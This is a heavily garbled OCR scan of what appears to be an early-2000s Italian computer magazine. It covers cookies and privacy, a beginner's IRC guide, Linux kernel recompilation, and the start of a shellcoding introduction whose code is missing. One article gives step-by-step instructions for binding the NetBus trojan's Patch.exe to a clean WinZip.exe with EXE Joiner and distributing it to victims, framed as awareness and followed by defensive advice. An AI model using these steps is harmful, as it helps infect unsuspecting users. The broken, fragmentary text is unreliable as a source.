nomy si servono per poter disporre 
di quanti più dati personali degli 
«nari utenti... Chiunque può ìfiImÉ 
facilmente carpire molte informa- 
zioni del vostro computer semflice- 
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preseti 




eventJE 
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in etl., 
questi e 


a pJn 
pot re 


sembrai 




a vista 
bbero 



no nemmeno 



ino in real- 
tà molto impor- 
r *r*" tanti per tutte quelle 
aziende che sviluppano, ad 
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vostro PC e un'interessante alternativa alla procedura manuale (cioè eli- 
minare singolarmente i cookie) può invece essere l'utilizzo di alcuni pro- 
grammi (in particolare è da segnalare Cookie Eater anche se ne esisto- 
no tanti altri più o meno avanzati dai nomi altrettanto invitanti come 
Cookie Kille, Cookie Monster...) che, attraverso piacevoli interfacce, i 
semplificano l'operazione di "pulizia" individuando automaticamente i lì 
cookies. Infine occorre ricordare per dovere di cronaca che, rispetto li 
ad Explorer, browser come Opera ma, soprattutto, Netscape e Mozil- Il *, 
la permettono un maggior controllo e una miglior personalizzazio- USL 
ne del livello di protezione proprio per quanto riguarda i cookie. /»fj 



»(f) 



esempio, siti Web e per i quali si- 
gnifica molto sapere che la mag- 
gioranza degli utenti usa Netscape 
piuttosto che Explorer (mmm... al- 
meno lasciatemelo credere ;) o che 
ha installato il plugin Macromedia 
Flash o meno. Il problema non sta 
quindi soltanto nel genere di infor- 
mazioni che vengono fornite quan- 
to nel fatto stesso die vengono 
"carpite" senza che l'utente stesso 
ne sia consapevole. I 



uno pubblicità mirata 

Per quanto riguarda la navigazio- 
ne in Rete vera e propria, i browser 
consentono una discreta protezione 
(bug permettendo) poiché esistono 
solo determinati dati che un brow- 
ser può inviare ad un server e altri 
dati ch# può inviare il server al 
browser. Gli unici file che un server 
Wflrpuò inviare al nostro computer 
sono i noti 'cookies 1 , ovvero file di 
testo (generalmente di piccole di- 
mensioni) che il browser memoriz- 
za e conserva in una directory ap- 
posita (C:\Windows\Cookies per chi 
usa ad esempio IE sul PC). Su un 
cookie generalmente non vengono 
solitamente dati sensibili ne tanto- 
meno il numero della vostra carta 
di credito e, occorre sottolinearlo, i 
cookie creati da un server non ven- 
gono letti da altri server. Proviamo 
a vedere cosa contiene: 



"***^-* 



Non ci soffer- 
meremo più di 
tanto sul con- 
tenuto; è pe- ^Crp/^J 
rò evidente 
come questo 

cookie memo- — _ 

rizzi la lingua impostata 
come predefinita per questo sito; 
pertanto anche alle successive 
aperture di questo sitò, se il cookie 
non sarà ancora scaduto, l'italiano 

sarà ancora la lingua di default. 

■ .. . . _____■•__ > . 



cookie vengono memorizzati da 
uno script contenuto ad esempio in 
un pop-up pubblicitario di un sito: i 
banner visualizzati nelle pagine 
Web dei portali non sono gestiti di- 
rettamente dal sito del portale, ma 
vengono spediti dai potenti server 
delle compagnie pubblicitarie e 
pertanto i banner visualizzati sui 
siti più disparati vengono in realtà 
inviati dal medesimo ad-server. Ec- 
co quindi che un cookie menjH-iz- 

m 

Adware e RefUpdate 
www.lavasoft.nu 

Cosa si può sapere sul vostro conto... 
www.gemal.dk/browserspy 

Una rubrica del New York Times 
sulla privacy in Rete 
www.nytimes.com/library/tech/refe- 
rence/index-privacy.html 

zato da una pagina diwi dato por- 
tale potrebbe benissimo essere let- 
to da quella di un altro se entram- 
bi si appoggiano sul medesimo ad- 
server, riuscendo coska ricostruire il 



"ione 



do un 
e o - 

/ ° k' e ' 
un ad- 
server 
"scopre" 

che un 



sito della 
Lamborghi- 
ni e quello di 



ie le aziende 
che gestiscono la visualizzazione 
dei banner possano avere interes- 
se ad utilizzare i cookie: se leggen- 



i piuttosto che dalla pubbhci- 
iu jn un ristorante nel South-Dako- 
ta! Sfruttando i cookie che si accu- 
lano nella cache del browser, è 
ossibile perciò seguire i suoi vari 
spostamenti da una pagina Web 
all'altra, studiare le sue preferenze 
e le sue abitudini e quindi, ad 
esempio, mostrare sulle pagine che 
richiede messaggi pubblicitari mi- 
rati affinché la campagna abbia 
più successo possibile... 



www.dittotech.com/Produc 
okieEater 

AnalogX CookieWall - Blocca i cookie 
www.a na logx.com 

Cookie Monster - Elimina tutti i co- 
okie de 
http://go.to/ampsoft 



Insomma: le trappole della rete so- 
no tante ma è possibile salvaguar- 
dare la propria privacy. Con un po' 
di attenzione e qualche accorgi- 
mento (leggete la licenza dei pro- 
grammi che installate...) potrete 
giocare, lavorare e navigare con 
molta più tranquillità! ti 

lele - www.altos.tk 
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UNA GUIDA PER MUOVERE I PRIMI PASSI SU IRC 



un territorio da esplorare 



Per il grande pubblico, la chat è un'attiuità che si può fare 
da un sito, da un programma di messaggistica istantanea, come Icq, o persino col 
cellulare. Per gli smanettoni autenitici, perù, l'unica e uera chat è quella di Ire. 



^RCuSaNE^ggf .__ 



1 ] ...Chat?? Ma co- 
s'è? Ah si. ..no ho ■- ,r t — ~^ 
\/ sentito parlare di- IriPI^^H 
/ verse volte in TV op- 
pure ho letto qualcosa sui giornali../' 
Ecco, diciamo che molte persone tut- 
t'oggi risponderebbero una frase , 
quantomeno simile se fosse loro do- 
mandato cosa sia una chat e soprattut- 
to come funzioni. 

La chat oramai è diventata uno stru- 
mento di comunicazione talmente diffu- 
so che vale la pena di spendere due pa- 
role per chiarire un concetto che, prò- Volete saperne a» w' w V- -j vostro 
prio a causa della sua diffusione massi- su j canali italiani. 
va, entrerà ben presto nel gergo comu- wvYW.ircitalia.net 



Ma di si cosa si tratta? 



prare, raccogliere informazioni, visitare 
siti professionali delle ditte più all'avan- 
guardia come all'opposto la misera pa- 
ginetta web dell'amico "sfigato" alle pri- 
ma armi con l'HTML, ma in tutti questi 
casi il risultato è sempre il medesimo: 
bytes, dati, elettroni, cose inanimate. La 
differenza e la rivoluzione della chat, e di 
IRC in particolare come capostipite, è 
proprio la diversità di ciò che riceviamo; 
comunicazione attiva, viva. Dall'altra 
parte del doppino telefonico non trovia- 
mo un server che passivamente ci invia i 
suoi dati, ma una persona in carne ed 
ossa che ci invia i suoi pensieri... affasci- 
nante non trovate?? 



» Le origini 



Tanto per dare una collocazione tempora- 
le all'argomento affrontato, diciamo subi- 
to che le origini di IRC si perdono indietro 
nel tempo di circa 15 anni. Era infatti il 
1988 quando Oikarinem in Finlandia svi- 
luppò la sua idea di chat ampliando da 
una base single-user ad una multi-user il 
classico programma talk utilizzato per la 



comunicazione fra due 
utenti in ambito di rete. I primi riconosci- 
menti vennero nel 1991 e nell'anno se- 
guente crebbe ulteriormente fino a toccare 
la soglia dei 5.000 utenti connessi con- 
temporaneamente, considerato all'epoca 
il limite tecnicamente invalicabile della re- 
te. Non molti anni dopo, nel 1999, EFnet, 
la più grande rete IRC, raggiunse gli oltre 
50.000 utenti simultanei e a tutt'oggi con 
l'aumento esponenziale dell'utilizzo di 
questa rete non si può predirre fin dove si 
potrà spingere questo valore. 
Ma cosa offre IRC? Beh... si potrebbe scri- 
vere un libro di 500 pagine per spiegare 
cosa ha offerto a me, ma purtroppo l'uni- 
ca ris posta logica alla d omanda è: "pro- 
vare". Farsi nuovi amici, fare nuove e 
, indipendentemente dall'aspet 
^^^^^■iHa religione ■ 
sviluppare comunità virtuali di 
persone che vivono nei posti più disparati 
al mondo, gestire progetti comuni, trovare 
conforto, idee, risoluzione di 
problemi. ..beh. ..questo e molto altro è 
IRC 

Come funziona in pratica IRC? Il concetto 
tecnico è assai semplice: tutti i computer 
sono connessi ad un server specifico ed 
ogni utente ha un "nome assoluto", non 
duplicabile all'interno della stessa rete (in 
gergo nickname, o più semplicemente 



veroo inglese to |Oin punire, 
unirsi). Il comando Join viene 
usato per entrare in un canale. 
"Joinare un canale" vuol quindi 
dire "entrare nel canale". 



"nick"), che lo identifica in maniera ine- 
quivocabile. Se l'utente A vuole mandare 
un messaggio all'utente B, questo mes- 
saggio non arriva direttamente da A a B, 
concetto che stava alla base del program- 



mite il nick) e lo spedisce quindi all'utente 



All'interno del server inoltre possono esse- 
re create delle stanze contrassegnate da 
un nome specifico (#nomestanza) dove si 
mette in atto la comunicazione multiutente 
a cui si accennava prima. Qualunque co- 
sa scritta nell'area "pubblica" viene letta 
da tutti gli utenti collegati a quella stanza. 

I COMANDI DI IRC 



Fra i più utili comandi che si possono 
impartire direttamente nella linea 
di comando troviamo: 

cambia il nick all'utente 
connesso 

nomeserver si connette ad 
un server specifico o cambia la con- 
nessione attuale 

si connette al 
canale specifico 

| cerca info sul nick spe- 
cificato 

manda un 
messaggio ad un determinato utente 
apre una fine- 
stra di dialogo privata con l'utente 
specificato (equivalente del doppio 
click sul nick dell'utente in mIRC) 

imposta lo stato 
"assente", specificando il motivo 
scritto nel messaggio 
chiude mIRC 
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C'è anche chi usa Ire per creare danni, 
spedendo file infetti da uirus e trojan. 



**•' "-cazzorra.org. 



» Mettiamolo 

in pratica 



Ma in pratica... come si fa?? Dopo tan 
teoria, vediamo quindi come fare a use 
re IRC nella pratica. Essendo una rete 
formata da server ci serviremo di un pro- 
gramma client per potervi accedere. 
mIRC () è esattamente ciò che fa al caso 
nostro. Una volta scaricato ed istallato si 
dovrà configurare nella maniera ottimale 
per il suo corretto funzionamento. Nella 



Querare: anche in questo 
caso, una maldestra italianizza- 
zione. Significa inviare una 
Query a un utente, mandando- 
gli un messaggio personale, 
ì non sarà visibile agli altri partecipan- 
i uella stanza. 



prima schermata delle opzioni (icona con 
cartella e martello) dovrete scegliere il 
server a cui collegarvi, specificare il vo- 
stro nome e la vostra email (vi consiglio 
di usare quella non ufficiale... non si sa 
mai...) e scegliere il vostro nickname. Ri- 
guardo alla lista dei server inserita su 
mIRC vi suggerisco di utilizzarne uno ita- 
liano (tin, fiscali. . .) per non avere proble- 
mi di rifiuto della connessione. Sfoglian- 
do le altre opzioni vedrete che sono tutte 
voci molto intuitive e che, nella maggior 
parte dei casi, non necessitano di essere 
variate a meno che non si voglia una 
personalizzazione specifica del client. 
Spenderò una nota solo a favore della 
voce DCCFolders dove si trova la voce 



DCC ignore; questa opzione serve per 
ignorare automaticamente l'accettazione 
di files con estensioni particolari poten- 
zialmente rischiose quali per esempio gli 
.exe, i .pif ed i .bat. Vi consiglio di attivar- 
la se non siete molto pratici di internet e 
di computer e soprattutto se non avete un 
buon antivirus aggiornato. Usando IRC vi 
accorgerete che tra le migliaia di persone 
interessanti con cui verrete a contatto ci 
saranno anche coloro i quali usano que- 
sta rete per creare danni spedendo files 
infetti da virus e trojan. Il mio consiglio 
resta quindi sempre quello di 



sta si riempirà di stanza da visitare...:! 
Via via vi capiterà di non riuscire ad en- 
trare nel canale che desiderate. Perché 
accade questo? Ci sono molteplici ragio- 
ni possibili. Il canale potrebbe essere "a 
invito": i moderatori del canale hanno 



Takkare, takkato: dal- 
l'inglese to take, prendere. Un 
canale si dice takkato quando è 
j stato rubato ai suoi legittimi 
proprietari 



Configurato a dovere il client siamo fi- 
nalmente pronti per addentrarci in IRC. 
Una volta premuto OK nella finestrella di 
configurazione non mancherà altro che 
connetterci al server per iniziare l'avven- 
tura. Ci sono due metodi per farlo: clic- 
care sull'icona del fulmine in alto a sini- 
stra, oppure scrivere /server nomeserver. 
Prendo spunto da questo tipo di collega- 
mento per introdurre un ulteriore concet- 
to: i comandi in linea. Su mIRC sono a 
decine e tutti iniziano col carattere spe- 
ciale /. I principali comandi sono elenca- 
ti nel riquadro "i comandi di Ire". 

>> E adesso? 

Ok, mi sono connesso. ..e ora?? Ora fi- 
nalmente s'inizia!!! Su IRC esistono mi- 
gliaia di stanze visualizzabili con il co- 
mando /list; non fatelo! A meno che non 
abbiate una connessione superveloce la 
mole di dati che ricevete da tale coman- 
do vi farà cadere dal server. Per iniziare vi 
consiglio di tentare col canale della vo- 
stra città: provate con #siena, #firenze, 
#genova, #palermo, tutti "joinabili" col 
comando /join #nomechan... Nel mo- 
mento in cui scrivo i canali #roma e 
#milano non sono utilizzabili in quanto 
"takkati". Potete provare con #romal, 
#roma2.. .magari siete fortunati!!! 



I metodo migliore per conoscere 

»c+n rr»munni|e il passaparola: C 

'ostri interessi, chiedete lo- 
ro se conoscono canali tematici o siti in- 
ternet in cui si parla di ciò che vi incurio- 
sisce e vedrete che ben presto la vostra li- 



I 



Se su Windows la stragrande mag- 
gioranza degli utenti utilizza mIRC 
( ) come client di chat, 

su Mac e Linux non c'è un preodmi- 
nio assoluto. Per quanto riguarda 
Mac, probabilmente il client più dif- 
fuso è Ircle ( ), per il 
quale esistono numerosi set di script 
già pronti (basta cercare Ircle su 
versiontracker.com per tovarne sva- 
riati). Un programma più recente 
ma che si sta facendo largo è Snak 
( ), meno 
completo ma forse più 
immediato e intui- 
tivo. Entrambi 
sono compati- 
bili con i siste- 
mi tradizio- 
nali e con il 
nuovo Mac OS 
X. Chi preferi- 
sce un client 
rilasciato sotto 
licenza GPL può 
invece rivolgersi 
Shadowlrc ( 

), che però non è 
compatibile con il nuovo Mac OS X. 
Per quanto riguarda Linux, il client 
più famoso a linea di comando è 
probabilmente BitchX 

( ), completamente 

scriptabile e programmabile, anche 
se poco adatto ai novellini e ai de- 
boli di cuore. Un client più semplice 
da utilizzare potrebbe essere XChat 
( ), che ha un'interfac- 

cia grafica XFree86. 
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PRATICA . ■ 



UNA GUIDA PER MUOVERE I PRIMI PASSI SU IRC 



deciso di non permettere l'ingresso a 
chiunque, ma solo a una determinata 
cerchia di persone conosciute. In questo 
caso, o riuscite a contattare un utente al- 
l'interno del canale e farvi invitare (/invi- 
te nickname #canale), oppure è bene 
che rivolgiate le vostre ricerche altrove. Il 
canale potrebbe poi essere "completo": 



» Operatori e bot 

te avete querato nick sbagliati. 
In cima alla lista di ogni chan ci sono va- 
ri utenti con la @ davanti al nick. Alcuni 
di essi sono umani e sono gli operatori 
che citavo prima, altri sono bot. Gli ope- 
ratori sono dei super-utenti che hanno 



Operatore: utente con po- 
teri speciali all'interno del cana- 
le. 



che l'attività proceda sempre nel miglio- 
re dei modi. I BOT sono inanimati, sono 
gestiti dagli amministratori del canale 
che li programmano al meglio. Non vi 



attività 
svolte. Nel primo 
menù a tendina 
si sceglie fra le 
query, la stanza 
pubblica o en- 
trambe, nei me- : =- — 
nù a spunta si decide lo stile e la di- 
mensione dei files e nell'ultima linea 
si può scegliere il percorso preferito. 



re la connessione. In linea 
di massima i server IRCnet 

.. non la 



richie- 



i o n o , 
ceglie- 



se set- 
taria o 



ignore pos- 
siamo sce- 
gliere le 
estensioni 
dei files in- 
desiderati 
(per esempio *.exe, *.bat, *.pif). 
Se siete utenti alle prime armi vi 
conviene settario per non incorre- 
re in spiacevoli sorprese. 



su alcuni chan è stabilito un numero fun: 
massimo di utenti all'interno che è già pac 
stato raggiunto; riprovate e prima o poi 
entrerete! Il vostro nick potrebbe poi es- 
sere stato bannato da un canale; può ca- 
pitare che (in maniera automatica, oppu- 
re per volere di un qualche operatore del 

canale), dopo essere entrati veniate sbat- 
tuti fuori; ciò è dato dalla visualizzazione ind» 
da parte del vostro client di un utente in- stra 
desiderato oppure perché avete contrad- mai 
detto le regole del canale. La soluzione do 



o le opzioni per 

rotocollo di invio 

file. Consigliamo 

non cliccare su 

toget files, in 

do da controlla- 

cosa vi arriva e 

lo manda. Sotto 

scelgono le op- 

►ni per la chat DCC; anche in questo ca- 
so, meglio non settore in automatico per 
evitare query non richieste a volte anche 

Mizzate per scopi non proprio amiche- 
i (...dccfucker...) 



funzione di controllo sul canale con ca- 
pacità di "kikkare" e "bannare" gli utenti 



DCC: direct client connection. 
Protocollo per scambio di dati 
fra due client. 



indesiderati. Ancora una volta, questi 
strani derivano dal nome inglese dei co- 
mandi a cui si riferiscono. Con il coman- 
do /kick, un operatore può espellere 



offendete se non vi rispondo perché 
semplicemente. ..non possono farlo! 
Provate con qualche utente senza la @, 
o con qualche nick che vedete chatt< 
in pubblico. Siate cortesi e nessuno vi 
negherà mai un caloroso benvenuto al- 
l'interno della nostra comuniti 
Questa breve carrellata all'interno di 
IRC spero sia servita per darvi un'idea di 
cosa sia questa rete, di cosa si possa fa- 
re utilizzandola e di come iniziare a far- 
lo. Nei numeri successivi ci addentrere- 



-- _ 



principale 
ssione: po- 
tete scegliere il net- 
work (IRCnet, EFnet, 
Azzurranet...) ed ij 
relativo server. È 
meglio scegliere 
server italiani, per- 
ché spesso quelli 
stranieri non permettono connessioni di 
ip "fuori paese". Nella seconda metà po- 
tete impostare il vostro nome ed email, 
meglio se non quella ufficiale, e decidere 
il vostro nick. 



ANulla di difficile da 
spiegare; date 

un'occhiata e sce- 
gliete quelle che vi 
sembrano più utili. 



migliore è contattare un operatore e 
chiedere informazioni e chiarimenti in 
merito. 

Bene, ora che siete dentro finalmente ini- 
ziate a "querare" (contattare direttamen- 
te, in modo personale) i presenti e vede- 
te un po' come va il vostro primo incon- 
tro. Se vi capita che nessuno vi risponda 
potreste essere capitati in un gruppo di 
maleducati, ma di certo non è questa la 
filosofia di IRC, oppure più probabilmen- 



temporaneamente un certo utente da un 
canale, mentre con /ban può impedirgli 
di rientrare (può "bandirlo" dal canale, 
appunto). 

BOT è una contrazione della parola ro- 
bot; in pratica, sono dei programmi che 
compiono azioni su un canale Ire. Sono 
montati su dei client perennemente con- 
nessi ad IRC e hanno funzioni di super- 
utente, controllando che nel chan non 
succedano intoppi e facendo in modo 



mo più nel cuore dell'argomento, ana- 
lizzando in maniera molto tecnica la co- 
municazione, come creare e gestire 
canale, chi sono e cosa fanno gli ope 
tori, i comandi del server, cos'è e come 
si configura una IPvó, la shell, la confi- 
gurazione dei BOT, i server IRC ed infine 
le problematiche di sicurezza e l'IRCwar. 
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Siete propria sicuri che dietra a quel, innocuo salua schermo con le signoria 
simpatiche e suestite non si celasse un malizioso cauallo di troia?' 



olti sono convinti che è possibi- 
le essere infettati solo con la 
Posta Elettronica o con l'inseri- 
mento di qualche CD nel pro- 
prio computer di cui non si co- 
nosce la provenienza. Costoro sottova- 

I ■ ■ ____•■_•■•■> _■• • r m 



tati con altri metodi tanto semplici 
quanto efficaci. 

Questi altri metodi di diffusione vengono 
applicati da pirati che sostanzialmente 
hanno il desiderio di impossessarsi del 
computer della vittima, per esempio instal- 
lando sul computer della vittima un caval- 
lo di Troia come Back Orifice, NetBus o 
sub7. Tanto per fare un esempio, il softwa- 
re NetBus è diviso in due parti: Netbus.exe 
e Patch.exe, quest'ultimo è quello che infet- 
ta il computer della vittima e naturalmente 
deve essere eseguito nel computer di que- 
st'ultimo. Ma come è possibile infettare la 
vittima con il file Patch.exe? 



ALCUNI ISTRUMEINT 
ANTI ITROJAI 



Spesso, un anti virus aggiornato 
non è sufficiente a identificare con 
certezza un cavallo di Troia. Per 
stare davvero tranquilli, conviene 
usare uno di questi: 



;i -trojan - ne 



atlt Trojan Scan 



an Kemov 



Tiny Trojan Tr 



Trojan Guarder 

www-your-soft-coi 



» Incollare 

insieme due file 

Una tecnica utilizzata dai pi- , 
rati è quella di incollare il 



software pulito, il tutto 
l'utilizzo di software ad ani ai 
scopo e con pochi clic del h 
Uno dei tanti software utilizzati potr 
re EXE JOINER oppure JOINER B 
che utilizza lo stesso principio ma funziona 
anche con altri tipi di files (jpg, bmp...). Crea 
un file che eseguirà in successione i 2 prece- 
denti (nel caso di una jpg e di un exe mostra 
la jpg ed esegue l'exe). 

Il programma EXE JOINER è di una 
semplicità assurda, e questo fa sì che 
possa essere utilizzato da qualsiasi 
perditempo che sappia accendere il com- 
puter e lanciare un programma. 
Basta cliccare su "Browse" Exe 1 path e cerca- 
re il file .exe pulito (ad esempio un program- 
ma per comprimere file come WinZip.exe) e 
cliccare su "Browse" Exe 2 Path per cercare il 
file infetto da incollare al software pulito (ad 
esempio Patch.exe del NetBus). In questo mo- 
do cliccando su JOIN il programmino unisce 
i due file in uno .exe. A questo punto basta 
distribuire il software WinZip infettato per fre- 
gare la vittima; questo può accadere anche 
attraverso un piccolo sito costruito apposita- 
mente. Quando vittima cliccherà sul file .exe, 
insieme al software pulito installerà anche, 
senza accorgersene, il file col virus. 



» Difese alzate 



Insomma, non basta stare attenti agli allegati 
delle mail, ma anche con quei programmi 
scaricati da internet che apparentemente ci 
sembrano "puliti". Ecco perchè è importante 
scaricare software solo da siti affidabi- 



buon antivirus prima di eseguire l'installa- 
zione. Se siete alla ricerca di materiale pre- 



^B 
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CI Tot 



sente solo 
in siti che 
non si pos- 
ono ritenere 



jna scansione con 



votelo su un computer che non contenga dati 
importanti per il vostro lavoro o studio. Dopo 
l'installazione, fate una verifica con un 
programma specifico per la rilevazio- 
ne dei trojan e controllate sempre che sul 
vostro computer non ci siano in esecuzione 
programmi server di cui non siete a cono- 
scenza. E* 

Michele A.I 
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COME AGGIORNARE IL PROPRIO SISTEMA 



Tieni in forma il tuo 







Negli scorsi numeri abbiamo 
visto come installare e aggior- 
nare un programma. Capita a 
volte che un certo programma 
richieda delle versioni più ag- 
_ giornate delle librerie, o che 
necessiti di una certa versione del Ker- 
nel per poter funzionare. In questo arti- 
colo vedremo come effettuare le opera- 
zioni necessarie ad aggiornare le libre- 
rie e ricompilare il Kernel. 

» Aggiornare le librerie 



Di solito la propria distribuzione forni- 
sce già i pacchetti delle librerie, da in- 
stallare tramite il programma di gestio- 
ne pacchetti della distribuzione stessa. 
Quando però si è costretti a fare 
le cose da soli, bisogna fare molta 
attenzione. In particolare, una modi- 
fica maldestra al contenuto della cartel- 
la "/lib/" potrebbe compromettere il 
funzionamento dell'intero sistema. 



I file delle librerie sono organizzati in 
modo complesso, per cui a questi file 
vengono affiancati dei collegamenti per 
rendere più facile richiamarli. Questi 
collegamenti sono molto importanti, e 
quando aggiorniamo i file, dob- 
biamo aggiornare anche i colle- 
gamenti. Solo alla fine, dopo esserci 
accertati che l'opeerazione è andata a 
buon fine, possiamo eliminare il file 
vecchio. 
Ecco un esempio dei collegamenti: 



Librerie: Frammenti di softwa- 
re che svolgono funzioni specifi- 
che e che vengono utilizzati da 
svariati programmi, che ne condi- 
vidono le funzionalità. Un esem- 
pio di libreria sono le DLL di Windows. 



Se vogliamo sostituire questa libreria con la 
versione 9.8.10, il cui file ha il nome 
"libc.so.9.8.1 0", facciamo così: 



Per creare il collegamento è stata necessaria 
l'opzione "-f", che permette di sovrascrivere il 
collegamento preesistente. Infatti non è pos- 
sibile eliminare prima il collegamento vec- 
chio, dato che si corre il rischio di un blocco 
di sistema. 
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Per sicurezza, è meglio lasciare le libre- 
rie vecchie perchè alcuni programmi 
potrebbero necessitarne. 

Quando una libreria subisce un aggiorna- 
mento significativo, per cui i numeri delle 
versioni sono molto differenti rispetto ai pre- 
cedenti, conviene affiancarle invece che so- 
stituirle. 

Se vediamo l'esempio precedente, mettiamo 
caso che la libreria da aggiornare sia arri- 
vata alla versione 10.1.1, con ilfile 
"libc.so. 10.1.1", si capisce subito che il colle- 
gamento "libc.so.9" non raggiunge questa 
libreria. 

In linea di massima, se tutto funziona a 
dovere, è meglio lasciare le cose co- 
me stanno, a meno che alcuni programmi 
non richiedano una versione specifica di 
"libc.so". Riagganciandosi all'esempio, dob- 



NEWBIE 



Certe uolte per installare un programma o utilizzare una periferica è 
necessario suolgere delle uere "operazioni a cuore aperto" sul proprio sistema. 



biamo creare un collegamento simile a 
"libc.so.9" solo denominato "libc.so.1 0" 



» Ricompilare il KERNEL 

Il Kernel è la base del sistema opera- 
tivo. I programmi utilizzano funzioni fornite 
dal kernel, e così non devono agire diretta- 
mente con la CPU. 

Il Kernel Linux è costituito normalmente di 
un solo file, che può essere "vmlinuz" o "zl- 
mage", "bzlmage" e altri ancora, ma ouò 
comprendere anche moduli aggiuntivi per 
la gestione di componenti hardware specifi- 
ci, che devono poter essere attivati e disatti- 
vati durante l'utilizzo del sistema. 
Quando parliamo di Kernel che ha tutte le 
funzionalità incluse in un solo file, parliamo 
di Kernel monolitico, mentre quando parte 
delle funzioni sono dentro moduli esterni, si 
dice Kernel modulare. Il Kernel monoliti- 
co ha il vantaggio di avere tutto in un 
file, ma è rigido e non permette di liberare 
risorse quando le periferiche gestite non 
servono più. Il Kernel modula- 
re ha il vantaggio di pò- 
ter disattivare i moduli a 
piacimento, in particolare 
quelli che gestiscono in modo 
diverso le 

stesse peiferiche. Tuttavia, essen- 
do strutturato in più file, può cau- 
sare errori. 

Di solito l'uso dei Kernel modu- 
lari dovrebbe essere riservato 
a utenti che hanno già una buo- 
na esperienza nella gestione dei 
Kernel monolitici, quindi per il momento 
non tratteremo questo argomento. Le 
distribuzioni forniscono un kernel che si 
adatti più o meno a tutte le esigenze. Per ot- 
tenere le massime prestazioni, per esempio 
per sfruttare il più possibile le istruzioni spe- 
cifiche del proprio microprocessore, è me- 
glio costruirsi un kernel ad hoc, ritagliato su 
misura per il proprio sistema. 
Per servono gli strumenti di sviluppo, cioè il 
compilatore e i sorgenti del kernel. I sorgen- 



ti si trovano sul web (www.kernel.org). Il 
numero di versione è strutturato in 3 livelli: 
x.y.z (es. linux-x.y.z.tar.gz), dove x è il valore 
principale e z quello meno importante. Pre- 
stiamo particolare attenzione a y, dato che 
se il suo valore è un numero pari la versione 
del kernel è abbastanza stabile, mentre un 
numero dispari sta a significare che è una 
versione in fase di sviluppo. 
I sorgenti devono trovarsi nella cartella 
"/usr/src/linux/". Se si usa un'altra posizione, 
bisogna fare un collegamento simbolico per 
raggiungere i sorgenti. Dobbiamo anche 
verificare che i collegamenti simbolici conte- 
nuti in "/usr/include/" siano corretti. 



Naturalmente "asm" varia a seconda della 
piattaforma utilizzata. 
Una volta posizionati i sorgen- 
ti, possiamo passare 
alla confiqura- 





>&>* 
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dell'installazio- 
ne. Leggiamo il file 
readme e procediamo così: 



;directory dove sono i sorgenti del Kernel 



;serve per eliminare i file e i collegamenti 
vecchi che potrebbero intralciare la nostra 
installazione. 



;questa è l'operazione più importante, in cui 
definiamo le caratteristiche e i componenti 
del nuovo Kernel. Se usiamo un Kernel ab- 
bastanza recente, possiamo usare: 



;sistema di configurazione a menu testuale. 



;sistema di configurazione con sistema gra- 
fico X. 

Se è la prima volta che ricompilate il Kernel 
vi consiglio di scegliere l'ultima opzione, da- 
to che è un pò più semplice per chi è alle pri- 
me armi con il sistema operativo. 

Ora possiamo passare alla compilazione 
vera e propria attraverso questo comando: 



;attenzione alla I maiuscola. 

Al termine della compilazione, sempre se è 
andata a buon fine, troveremo il nostro Ker- 
nel nella cartella "/usr/src/linux/i386/boot/" 
col nome di "bzlmage". Attenzione: se 
i create un Kernel troppo grande, po- 
rrebbe non rientrare nella dimen- 
zione massima del file, e quindi il 
i processo di compilazione non si com- 
L pleterà. 

Una volta relizzato il Kernel, provia- 



mo a vedere se funziona; bisogna 
^spostarlo nella directory "/boot/" 
- -\ dandogli come nome "vmlinuz", 
^ma prima è meglio fare una pro- 
va creando un floppy che carica 
il nuovo Kernel anziché quello 
precedente. Scriviamo quindi: 



e riawiamo il nostro sistema operativo. Se il 
kernel si carica senza problemi, si può co- 
piare il kernel nella directory /boot/, togliere 
il floppy e riawiare il computer. cj 

Lucifero88 
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INTRODUZIONE ALLO SHELL CODING 
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I fine di questo articolo è quello di aiutare a compren- 
dere i meccanismi che si nascondono dietro gli shellco- 
de e stimolare il lettore ad approfondire il tema, aiu- 
tandolo a raggiungere l'abilità di scrivere shellcode au- 
tonomamente. Spero sia utile a chi sia avvicina al 
la sicurezza; a chi ha un sistema da "difendere" 
e vuole capire le tecniche di attacco dei crackers. 
Per comprendere a fondo i contenuti qui presentati, è necessaria 
una conoscenza anche superficiale di assembler x86, architettura di 
sistema, un po' di linguaggio C, grande entusiasmo e motivazione 
(che poi vorrebbe dire notti insonni a provare e riprovare). 
Non ci soffermeremo sul buffer overflow. Esistono testi in italiano che 
hanno parlato del buffer overflow (vedere i vecchi numeri di BFi, 
www.sOftpj.org/bfi); chi conosce l'inglese può trovare nella bi- 
bliografia i riferimenti necessari. Vogliamo solo ricordare che lo 
shellcode viene generalmente inserito nello stack tramite funzioni di 
copia delle stringhe (es. strcpy); questa funzione prevede che la fine 
della stringa sia identificata dal carattere 0, quindi lo shellcode non 
può contenrere questo carattere. 

In questa sede naturalmente si parla dei casi basilari, necessari per 
spiegare i concetti. Non si parla di heap, overflow da un byte, di 
shellcode polimorfiche e nemmeno di contromisure contro gli IDS: 
credo sia già abbastanza complicato così per chi deve capire il mec- 
canismo. Ricordo solo che per ottenere una root shell, il cracker de- 
ve attaccare un programma che giri con i privilegi di root e sia ac- 
cessibile anche da un utente normale (suid). 



Lo shellcode non è altro che codice macchina, solitamente inserito 
tramite un exploit (buffer overflow). Si tratta di codice immesso 
arbitrariamente dall'attacker con lo scopo di ottenere un 
accesso da remoto, o per elevare i propri privilegi all'in- 
terno di un sistema (per esempio, diventare root anche se si è un 
utente normale). Come dicevamo, si tratta di codice macchina, 
quindi inevitabilmente legato ad un'architettura. Uno shellcode 
per x86 non funzionerà mai su un'architettura sparc o ppc; 
e naturalmente uno per Linux non funzionerà su Windows. 
In questa sede si parlerà di shellcode x86 su piattaforma Linux; il let- 
tore deve essere in grado di compilare programmi con gcc e deve 
conoscere (anche in modo superficiale) gdb. Realizzeremo uno 
shellcode classico: l'esecuzione di sh come root partendo dai privi- 
legi di utente. 



Prima di fare una cosa è necessario avere ben presente che cosa si 
vuole fare. Lo shellcode inizia dove il buffer overflow finisce: siamo 
riusciti a iniettare il nostro codice, possiamo fare quello 
che vogliamo. Vogliamo ottenere una shell root: come fa- 
re? Molto semplice, utilizziamo la funzione execve per eseguire 
/bin/sh. Per prima cosa scriviamo un programmino in C che esegue 
quanto appena detto: 




Hill 



Questo semplice programma esegue /bin/sh e termina. I dettagli 
della funzione execve li trovate in man execve. A noi basta sapere 
che necessita di tre parametri: 

1 . la stringa che contiene il comando da eseguire 

2. puntatore a un array con i parametri da passare (per noi 0) 

3. i parametri di ambiente (per noi nulli). 
Compiliamo il programmino con -static e poi lanciamo gdb: 



quindi andiamo a vedere cosa fa la funzione execve: 



tmtm 
EHSBI 






